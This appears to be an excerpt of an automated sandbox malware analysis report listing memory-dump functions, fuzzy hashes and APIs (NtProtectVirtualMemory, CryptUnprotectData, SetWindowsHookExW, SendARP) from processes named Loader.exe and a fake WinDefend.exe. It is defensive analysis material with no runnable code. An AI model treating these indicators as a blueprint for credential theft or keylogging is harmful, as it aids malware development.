Opcode Fuzzy Hash: 37b7f00a03fbd4eb0aa7ef1e4cafa75fbc0ed51ad8ef0ee9d439e12e254cec3f
Instruction Fuzzy Hash: 6A51AB356002059FDB15DF28C854BAE77A2EF84314F15846EE90A9B3B6CF36EC46CB91

Function 02CFCF9C Relevance: 1.6, APIs: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02CFE849

Memory Dump Source

Source File: 00000004.00000002.3284519449.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cf0000_WinDefend.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b755d8394413436b23f0e4cb28d6c50d897abd8c8be4138efba906d1b91ce4b9
Instruction ID: 204fa5a2d58c290c120ed36704cf40c03f64558dea77ee9bc825a06e91e3f502
Opcode Fuzzy Hash: b755d8394413436b23f0e4cb28d6c50d897abd8c8be4138efba906d1b91ce4b9
Instruction Fuzzy Hash: 0851E7B1D00218CFDB60DFA9C940BDEBBF5BF49300F1080AAD509AB251DB756A89CF91

Function 02CF2623 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 02CF26DF

Memory Dump Source

Source File: 00000004.00000002.3284519449.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cf0000_WinDefend.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b62a0ce047767565fef8f28e55a00b57cd24479b422d70753f6090fad55e5bdd
Instruction ID: c90ab20f1fb91528345366f13aa11489abf7516e47abe8c9f56e53a6454e1232
Opcode Fuzzy Hash: b62a0ce047767565fef8f28e55a00b57cd24479b422d70753f6090fad55e5bdd
Instruction Fuzzy Hash: A541BAB4D042589FCB11CFA9D880ADEFBB1AF1A310F14906AE814B7251D374A945CF65

Function 02CF2638 Relevance: 1.6, APIs: 1, Instructions: 94
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 02CF26DF

Memory Dump Source

Source File: 00000004.00000002.3284519449.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cf0000_WinDefend.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: bd103ee054fa0bae36ac726523c2449a20d1e378f83c2e28fd01dcabf19106a8
Instruction ID: af991aef3b91beebd2ed81313c123336c3fb4dbdf7a27d77a8f812f1e676b9c5
Opcode Fuzzy Hash: bd103ee054fa0bae36ac726523c2449a20d1e378f83c2e28fd01dcabf19106a8
Instruction Fuzzy Hash: 9C31A9B8D002589FCF10CFA9D880ADEFBB1BB19310F14902AE814B7210D374A945CFA4

Function 04F510CB Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3378313571.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f50000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4943637e58e0e767283cf6eb54054868fe6ca375077d23168b824f2a6291e480
Instruction ID: 42b9e8a6b3102d2c797b949a01bd56f908deb4a13c07d37f581b394517ecbfe4
Opcode Fuzzy Hash: 4943637e58e0e767283cf6eb54054868fe6ca375077d23168b824f2a6291e480
Instruction Fuzzy Hash: 88B1D775E01218DFDB64DF65D980BDEBBB2BB49300F1091AAD919B7264EB706E81CF40

Function 04F51009 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3378313571.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f50000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b861da3ef39c43332980689f1882f7d729181b24d08559764df8c25444ff02f2
Instruction ID: eea0d49c22f953514f8da21b13c59c53689406c2293ddb7263b0900b90d45536
Opcode Fuzzy Hash: b861da3ef39c43332980689f1882f7d729181b24d08559764df8c25444ff02f2
Instruction Fuzzy Hash: 49B1D675E01218DFDB64DF65D980BDEBBB2BB49300F1095AAD919B7264EB306E81CF40

Function 04F51939 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3378313571.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f50000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18fd14b73f01d98b5c92cd0347b1b3fd12a95b4af31b03679d1af515169d01d7
Instruction ID: 48578ea7fd67798f2001d74b3452f2b8e623525b1631e94bc5f72274af6e4a83
Opcode Fuzzy Hash: 18fd14b73f01d98b5c92cd0347b1b3fd12a95b4af31b03679d1af515169d01d7
Instruction Fuzzy Hash: 4431C974E15218CFCB04DFA8E680AEDBBB2FB89300F10552AD51AB7258DB346D52DF15

Function 014CD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3279901058.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_14cd000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a36e615e922ad38e06d10fe1039e42bca0358c42f0fb784b2d31e1175944435
Instruction ID: 8b195a6143c7cd69ab5485bbd1bc157c454bd6e49b7846a6b9bbf3364025712a
Opcode Fuzzy Hash: 6a36e615e922ad38e06d10fe1039e42bca0358c42f0fb784b2d31e1175944435
Instruction Fuzzy Hash: D621E079900240DFDB45DF58D980B27BF65FB98718F20857EE9090A266C33AD416CAE2

Function 014DD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3280905137.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_14dd000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ac78dec12e32b68c214c4d83399d911936a42e5d50422bc0a2dbed7eac857ca
Instruction ID: 2715804c4f09bc527df8a35440f9343ec7f500fa468ec5b9941be8c061f2019a
Opcode Fuzzy Hash: 3ac78dec12e32b68c214c4d83399d911936a42e5d50422bc0a2dbed7eac857ca
Instruction Fuzzy Hash: E72103B1904200DFCF16DF68D990B16BF65EB88318F20C56AD90A0B3A6C33AD407CA61

Function 014DD005 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3280905137.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_14dd000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 744474925c4ed2f9a4d7d21c1b002f191a3d342c9457058ae05d8dcc387e44fe
Instruction ID: 78e05ccdb83fdd38404882061d3e25c86b8eb4dbe7ac1830fc7238daa9978296
Opcode Fuzzy Hash: 744474925c4ed2f9a4d7d21c1b002f191a3d342c9457058ae05d8dcc387e44fe
Instruction Fuzzy Hash: 512183755083809FCB03CF64D994712BF71EB86214F28C5DBD8498F2A7C33A9806CB62

Function 014CD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3279901058.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_14cd000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: cc6c6226053de6138b7ff8b1735ce320d0d19697113d59465e0cd4d54e1100c5
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: 1D11DF76804280CFCB02CF54D9C4B16BF71FB98714F24C6AED9490B266C336D45ACBA2

Function 014CD889 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3279901058.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_14cd000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0c6d9e29f76ad05df395ec60c6929fca91df4fda5164ad50540e673c46a6b29
Instruction ID: 954eeacb786b24efa9a5d87110511d5b3e07af95081afffe43d3038af98ac773
Opcode Fuzzy Hash: c0c6d9e29f76ad05df395ec60c6929fca91df4fda5164ad50540e673c46a6b29
Instruction Fuzzy Hash: 5701F7358043409AE7619A9ACD84B67BF98EF45B20F18C43FED1D0A2A6C3399841CAF1

Function 014CD888 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3279901058.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_14cd000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 787f1877665d107749b1dc2a302bb72da50811bdf2e259bb07e0047a6690c6d1
Instruction ID: db9bd6b58015aada1ef94cc1f5f341aeea9b53754e73d08035a7dcceff19edec
Opcode Fuzzy Hash: 787f1877665d107749b1dc2a302bb72da50811bdf2e259bb07e0047a6690c6d1
Instruction Fuzzy Hash: FAF0C2758043449EEB219A0ACC84B63FFA8EF45624F18C46AED0C4A297C3799840CAB0

Function 04F506F0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3378313571.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f50000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7ae5b70659ce4ce5b03df1126f7a46accbfcc46e43de0dde8c80562d22e2b43
Instruction ID: 3c58b0d19a4b1059980c18ed9af502c60e09cab44a71761d26379726c9b5f14f
Opcode Fuzzy Hash: a7ae5b70659ce4ce5b03df1126f7a46accbfcc46e43de0dde8c80562d22e2b43
Instruction Fuzzy Hash: 62E092323507419FC7654E55F9009EA77E6AFC5321704816AE549C7531D66A5812CB41

Function 04F51A73 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3378313571.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f50000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d1ca6cf4234ef116cd7285ee2449381999045630bce8f9004b2f0c77504120b
Instruction ID: 8dd23c73d7b26857b93d25f8dd5df136c250d65b05dade9d992f71877ecf79b4
Opcode Fuzzy Hash: 8d1ca6cf4234ef116cd7285ee2449381999045630bce8f9004b2f0c77504120b
Instruction Fuzzy Hash: 97E0C270D292489FCF62DBB8D4946ACBFF0AB0A301F0491EAC858D7261D6355A54CF42

Function 04F51AF8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3378313571.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f50000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3272a96651727ad2e0a604c60a83471d21ffeb417f1bf11d2f79525c77d69848
Instruction ID: f41982eff4f7316be6c2b4176014eee1c3c8ee50454247f3d040a66fb6641a83
Opcode Fuzzy Hash: 3272a96651727ad2e0a604c60a83471d21ffeb417f1bf11d2f79525c77d69848
Instruction Fuzzy Hash: BEE01A70D4A2489FCB56EFB8E5556DDBFB0EF46304F2482EAC848A7261E6315A18CB41

Function 04F51B37 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3378313571.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f50000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bd904511affa5b40ddcfb58d8873bc99dc340493ad6b9207faca93a5096ec97
Instruction ID: 1c1140ea1b3dc133514649a7aa8656448acdb0ccb219e3667e9d5a01adb4a42b
Opcode Fuzzy Hash: 3bd904511affa5b40ddcfb58d8873bc99dc340493ad6b9207faca93a5096ec97
Instruction Fuzzy Hash: 6FF03930D09288AFCB12DBB894516DCBFB0AB06214F0480EBC844D3262D6394608CB02

Function 04F50700 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3378313571.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f50000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e8cec923d1f20611d928adb064629650ee0dc2d54dc5d47229625f3a1574620
Instruction ID: 6177318cf8fe9fc424781afe17337f4031d534dcecafe2d283b982462a87af0f
Opcode Fuzzy Hash: 3e8cec923d1f20611d928adb064629650ee0dc2d54dc5d47229625f3a1574620
Instruction Fuzzy Hash: 21D05B373006015BC7255956FD00D6B779B9BC4765B04806DFA5DC7660DB51A8129750

Function 04F51B48 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3378313571.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f50000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 316807cf478bf69c54efd25dee5c94c1fc09c9c644f6142bd00645d90caecd3f
Instruction ID: 4531dff18c0e3e3498bc43c949483d6ed0925249da39a6bf817919f60e8a8b6e
Opcode Fuzzy Hash: 316807cf478bf69c54efd25dee5c94c1fc09c9c644f6142bd00645d90caecd3f
Instruction Fuzzy Hash: D3E0E270E01208AFCB50EFA9D40569CBBF4AB04300F0081AA8818A3260E774AA51CF81

Function 04F51A80 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3378313571.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f50000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 870b5d2c0934d9024d12304ec57a916169087a5d391caccc480e2c6368cdad37
Instruction ID: 7909c32f5ea7727fcf462a62ba076d7a9f2b56409602a5e1e4098aa4b511f7f6
Opcode Fuzzy Hash: 870b5d2c0934d9024d12304ec57a916169087a5d391caccc480e2c6368cdad37
Instruction Fuzzy Hash: 38E0E274D01208AFCBA1EFB9E40469CBBF4AB08300F0081AA8828E3250EB346A50CF81

Function 04F51B08 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3378313571.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f50000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9d323fe29cd1b94f7d070e294550a9f6cc914165e368397cc78db791611ab07
Instruction ID: ed17eb4046de0e500eb1b1b36b7d2562c6ea186aef8ff89c832b489c3c3970d6
Opcode Fuzzy Hash: e9d323fe29cd1b94f7d070e294550a9f6cc914165e368397cc78db791611ab07
Instruction Fuzzy Hash: 65D05E70D4530CAFCB14EFB8E40469DBBF4BB44300F10C2A98818A3364EB306A54CB85

Analysis Process: Loaader.exePID: 7280, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	29.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	5
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF848F431DE Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 448
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 00007FF848F43534

Strings

HAH, xrefs: 00007FF848F43409
HAH, xrefs: 00007FF848F433A7

Memory Dump Source

Source File: 00000012.00000002.2125510869.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f40000_Loaader.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID: HAH$HAH
API String ID: 2706961497-524784639
Opcode ID: f82f05c1df4f366505172f97c27eab2f28ca83e54896ace40a17d44b1e3ecbaa
Instruction ID: 1213269f5bf2584b6a3a6c8d7780cad152d68f58b58a5215216e9df6ef336ead
Opcode Fuzzy Hash: f82f05c1df4f366505172f97c27eab2f28ca83e54896ace40a17d44b1e3ecbaa
Instruction Fuzzy Hash: C0C1573191DB495FE71DEB2898166FA77E1EF95720F0442BFE08AC31D7DE2868068781

Analysis Process: Loader.exePID: 7296, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	23.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	15
Total number of Limit Nodes:	1

Executed Functions

Function 00007FF848F13D6E Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 486
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 00007FF848F14114

Strings

cU_H, xrefs: 00007FF848F13F91
HAH, xrefs: 00007FF848F13F87
HAH, xrefs: 00007FF848F13FE9

Memory Dump Source

Source File: 00000013.00000002.2127280328.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f10000_Loader.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID: HAH$HAH$cU_H
API String ID: 2706961497-700276299
Opcode ID: 99f50f6a93f4c0452724958cefda5e1cb6654741fb9f9b4be0301cbf1c3087ab
Instruction ID: d5a65f8766f281591c741e24ea2ce8171169c986a6008ba4037f80c163f8b9b9
Opcode Fuzzy Hash: 99f50f6a93f4c0452724958cefda5e1cb6654741fb9f9b4be0301cbf1c3087ab
Instruction Fuzzy Hash: B0D1483191DB495FE71DAB2898562FA7BE1EF96360F0441BED08AC31D7DE2868068781

Function 00007FF848F14048 Relevance: 1.6, APIs: 1, Instructions: 128
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 00007FF848F14114

Memory Dump Source

Source File: 00000013.00000002.2127280328.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f10000_Loader.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 6005ae8b4c9b3dbd6f2b024d2023700cf72cbb98f18d95ef2b9a5c03370520ee
Instruction ID: d62ec98a8cb0e119426232c7bc3a3b752c06e7b549a3fc84ab660c0459fb9682
Opcode Fuzzy Hash: 6005ae8b4c9b3dbd6f2b024d2023700cf72cbb98f18d95ef2b9a5c03370520ee
Instruction Fuzzy Hash: BF31937191CB5C4FDB58EB5CA8066ED77E1EB98320F00426FE44AD3286CB74A8458BC5

Analysis Process: Loader.exePID: 7384, Parent PID: 1520COMMON

Execution Graph

Execution Coverage:	21.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	14.3%
Total number of Nodes:	21
Total number of Limit Nodes:	2

Executed Functions

Function 00007FF848F33DBE Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 444
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 00007FF848F34114

Strings

HAH, xrefs: 00007FF848F33F87
cS_H, xrefs: 00007FF848F33F91
H, xrefs: 00007FF848F33DE9
HAH, xrefs: 00007FF848F33FE9

Memory Dump Source

Source File: 00000014.00000002.2904893851.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f30000_Loader.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID: H$HAH$HAH$cS_H
API String ID: 2706961497-573668203
Opcode ID: ed3b716d7ec4832d18ba2011e5bd65d882bee7f1d15f8c3a8f0243551a144c28
Instruction ID: 83b047ebef3a5a3341ecae58d48d5fa7d935a5f96e210446b2751522d196b269
Opcode Fuzzy Hash: ed3b716d7ec4832d18ba2011e5bd65d882bee7f1d15f8c3a8f0243551a144c28
Instruction Fuzzy Hash: 78C1663191DA495FE71DEB3898562FA77E1EF95360F0441BFE08AC31D7DE2868068781

Function 00007FF84912DDB5 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 313
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32 ref: 00007FF84912DFC0

Strings

P=_H, xrefs: 00007FF84912E042

Memory Dump Source

Source File: 00000014.00000002.2954381283.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff849120000_Loader.jbxd

Similarity

API ID: CryptDataUnprotect
String ID: P=_H
API String ID: 834300711-2212376132
Opcode ID: c29438e534051bda7baffa3a0b607f92416bac0bd57ca299f02e097b7d8ea9a1
Instruction ID: 6e9ea8d5c239da9d750020958d0453ef8c1f14934a93ef9f18976dfe17a8caa8
Opcode Fuzzy Hash: c29438e534051bda7baffa3a0b607f92416bac0bd57ca299f02e097b7d8ea9a1
Instruction Fuzzy Hash: A5A1C23090DA5C4FDB94EF18D855BE9BBF0FF55310F0442AAD00DE7292DA796985CB80

Function 00007FF8491200F2 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 284
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

P=_H, xrefs: 00007FF84912E042

Memory Dump Source

Source File: 00000014.00000002.2954381283.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff849120000_Loader.jbxd

Similarity

API ID:
String ID: P=_H
API String ID: 0-2212376132
Opcode ID: 6dc7fc95aa6e8daff4b2b32dc4fc06ab4b0015d03bed95fb780bf5da575d0d9b
Instruction ID: 126e59cde02f1aa2b85fd46aa743a02aa462c02ed69350339dab7dc9a89585e7
Opcode Fuzzy Hash: 6dc7fc95aa6e8daff4b2b32dc4fc06ab4b0015d03bed95fb780bf5da575d0d9b
Instruction Fuzzy Hash: 87918431908A5D8FEBA8EF58D8457E9B7F0FB58310F1042AED40DE7292DE74A9458F81

Function 00007FF848F35D48 Relevance: 1.6, APIs: 1, Instructions: 137COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32 ref: 00007FF848F35E11

Memory Dump Source

Source File: 00000014.00000002.2904893851.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f30000_Loader.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 8a2e7473bb60d23a1969052b8f2462c58924a7772d727d217f1c30a96908b5a4
Instruction ID: 88f686fb62fc280e9a6db7ca459272b7f0de39eefe1d7e1171de96da975353b7
Opcode Fuzzy Hash: 8a2e7473bb60d23a1969052b8f2462c58924a7772d727d217f1c30a96908b5a4
Instruction Fuzzy Hash: CE41193091CA5D4FDB58EB6C984A6F97BE1EB99321F00427FD00DC3292CB64A852C7C5

Analysis Process: Loaader.exePID: 7392, Parent PID: 4824COMMON

Execution Graph

Execution Coverage:	16.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	8
Total number of Limit Nodes:	1

Executed Functions

Function 00007FF848F031DE Relevance: 1.9, APIs: 1, Instructions: 446
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 00007FF848F03534

Memory Dump Source

Source File: 00000015.00000002.3583965537.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff848f00000_Loaader.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 4b37b6a69d8136264a6f0038b8ec41dbe5e0bc13f7cb8efee553ac8a327a3eae
Instruction ID: 38861f7a8e57eb3af3bf2c08c0e32f363655f9af7e6ac6a0c8b1c3f7e2881c2b
Opcode Fuzzy Hash: 4b37b6a69d8136264a6f0038b8ec41dbe5e0bc13f7cb8efee553ac8a327a3eae
Instruction Fuzzy Hash: 29C1573191DB495FE71DEB3898562FA77E1EF96360F0441BEE08AC31D7DE2868068781

Function 00007FF8490FCF9D Relevance: 1.7, APIs: 1, Instructions: 163COMMON

Download Yara Rule

APIs

SendARP.IPHLPAPI ref: 00007FF8490FD088

Memory Dump Source

Source File: 00000015.00000002.3598633886.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff8490d0000_Loaader.jbxd

Similarity

API ID: Send
String ID:
API String ID: 121738739-0
Opcode ID: 7aea7e3d03e04cc4910878251620d74539f1a96890dc0df5488b3f76ff731225
Instruction ID: f62a56258b092999b1f6cca1c09569b71d42f4a6d452277bc5497e274a74f207
Opcode Fuzzy Hash: 7aea7e3d03e04cc4910878251620d74539f1a96890dc0df5488b3f76ff731225
Instruction Fuzzy Hash: FF41F67090D7889FDB1ADB6898456A9BBF0FB56321F0441BFC049C7192CB646946C792

Analysis Process: WinDefend.exePID: 7572, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	18.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	392
Total number of Limit Nodes:	30

Executed Functions

Function 05DDD290 Relevance: 1.9, APIs: 1, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3455748350.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5dd0000_WinDefend.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 64daf7d328812b28c8d6facb85ca09ea4815ee4298af9ffecb98a88358ad4544
Instruction ID: eef92a4ef2fc5867d8c9625c1aaa053fbf6e5098960e87a168b02245b45663f2
Opcode Fuzzy Hash: 64daf7d328812b28c8d6facb85ca09ea4815ee4298af9ffecb98a88358ad4544
Instruction Fuzzy Hash: 04F11B30A00209DFDB14EFA9C944BADFBF2FF44304F15856AD40AAB265DB75E945CBA0

Function 062C0C18 Relevance: 1.8, Strings: 1, Instructions: 541COMMON

Download Yara Rule

Strings

uI[, xrefs: 062C1442

Memory Dump Source

Source File: 00000016.00000002.3462770615.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_62c0000_WinDefend.jbxd

Similarity

API ID:
String ID: uI[
API String ID: 0-2758268925
Opcode ID: 0abbdeba09117b55fb42beb33e979438f7cc06de5764d135d10286fd8fdf7514
Instruction ID: 799faa570616bbb477a53eb4a52f2191d2b69c604ccd9576499348e7a858ddcf
Opcode Fuzzy Hash: 0abbdeba09117b55fb42beb33e979438f7cc06de5764d135d10286fd8fdf7514
Instruction Fuzzy Hash: 09322874E15228CFDBA4CF64D985B9DBBB2FF8A310F1095AAD809B7250DB705A80CF50

Function 062C0C08 Relevance: .3, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3462770615.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_62c0000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ca2e4cfa88e56a43f83a616c27afceece7b997820f74b6f28129bbbaaebb0e8
Instruction ID: 00d90d9d0317ed11693849542bb10bc104c40629c2f962281d82d744bbf42114
Opcode Fuzzy Hash: 3ca2e4cfa88e56a43f83a616c27afceece7b997820f74b6f28129bbbaaebb0e8
